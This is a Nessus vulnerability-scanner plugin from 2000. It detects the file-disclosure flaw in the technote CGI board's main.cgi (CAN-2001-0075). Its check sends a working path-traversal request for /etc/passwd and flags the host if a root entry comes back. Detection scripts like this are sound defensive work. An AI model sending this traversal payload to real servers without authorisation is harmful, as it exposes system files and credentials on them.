home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / technote.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  91 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10584);
  10.  script_bugtraq_id(2156);
  11.  script_version ("$Revision: 1.14 $");
  12.  script_cve_id("CAN-2001-0075");
  13.  
  14.  name["english"] = "technote's main.cgi";
  15.  name["francais"] = "technote's main.cgi";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "The technote CGI board is installed. This board has
  19. a well known security flaw in the CGI main.cgi that lets an attacker read 
  20. arbitrary files with the privileges of the http daemon (usually root or 
  21. nobody).
  22.  
  23. Solution : remove it from /cgi-bin.
  24.  
  25. Risk factor : High";
  26.  
  27.  
  28.  desc["francais"] = "Le forum 'technote' est installΘ. Celui-ci possΦde
  29. CGI main.cgi ayant un problΦme de sΘcuritΘ bien connu qui permet α n'importe 
  30. qui de faire lire des fichiers arbitraires au daemon http, avec les 
  31. privilΦges de celui-ci (root ou nobody). 
  32.  
  33. Solution : retirez-le de /cgi-bin.
  34.  
  35. Facteur de risque : SΘrieux";
  36.  
  37.  
  38.  script_description(english:desc["english"], francais:desc["francais"]);
  39.  
  40.  summary["english"] = "Checks for the presence of /technote/main.cgi";
  41.  summary["francais"] = "VΘrifie la prΘsence de /technote/main.cgi";
  42.  
  43.  script_summary(english:summary["english"], francais:summary["francais"]);
  44.  
  45.  script_category(ACT_GATHER_INFO);
  46.  
  47.  
  48.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  49.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  50.  family["english"] = "CGI abuses";
  51.  family["francais"] = "Abus de CGI";
  52.  script_family(english:family["english"], francais:family["francais"]);
  53.  script_dependencie("find_service.nes", "no404.nasl");
  54.  script_require_ports("Services/www", 80);
  55.  exit(0);
  56. }
  57.  
  58. #
  59. # The script code starts here
  60. #
  61.  
  62.  
  63.  
  64. include("http_func.inc");
  65. include("http_keepalive.inc");
  66.  
  67.  
  68. function check(url)
  69. {
  70.  req = http_get(item:string(url,"/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../etc/passwd"),
  71.          port:port);
  72.  r = http_keepalive_send_recv(port:port, data:req);
  73.  if ( r == NULL ) exit(0);
  74.  
  75.  if(egrep(pattern:".*root:.*:0:[01]:.*", string:r))
  76.      security_hole(port);
  77. }
  78.  
  79.  
  80.  
  81. port = get_http_port(default:80);
  82.  
  83. if(!get_port_state(port))exit(0);
  84.  
  85. check(url:"/technote");
  86.  
  87. foreach dir (cgi_dirs())
  88. {
  89.  check(url:dir);
  90. }
  91.